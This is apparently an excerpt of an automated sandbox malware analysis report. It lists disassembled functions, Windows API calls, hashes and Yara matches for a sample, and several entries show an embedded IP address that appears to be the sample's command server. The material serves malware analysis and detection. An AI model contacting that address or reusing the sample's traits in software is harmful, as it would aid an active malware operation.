                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 89fbce9ef6911b3f7a181470303265efeba8fc05d8566701dc68da8c1070cfd8
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 1E216271600605AFEB11EFA598C0C6BB7ADFF842AC7108579E91B97250E735FC50CBA0
                        Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                        Function 04961482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                        Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                        Function 049635E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                        Function 049686EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                          • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                        Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                        • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                          • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                        • ___initconout.LIBCMT ref: 0041CC5B
                          • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                        Function 0496CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                        • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                          • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                        • ___initconout.LIBCMT ref: 0496CEC2
                          • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                        Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                        • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                        • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                        • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                        • String ID:
                        • API String ID: 3269011525-0
                        • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                        • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                        Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                        • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                        Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                        Download Yara Rule
                        APIs
                        • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                        • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                        • String ID: vector too long
                        • API String ID: 3646673767-2873823879
                        • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                        • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                        Function 0495BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 3480331319-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                        Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                        Function 0495C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                        Function 00401000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401084
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                        • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                        • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                        • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                        Function 00401110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401194
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                        • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                        • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                        • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                        Function 00401220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004012A4
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                        • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                        • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                        • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                        Function 04951487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 0495150B
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                        • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                        • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                        • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                        Function 04951267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 049512EB
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                        • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                        • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                        • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                        Function 04951377 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 049513FB
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                        • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                        • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                        • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                        Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004084EE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                        • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                        • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                        • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                        Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407EEE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
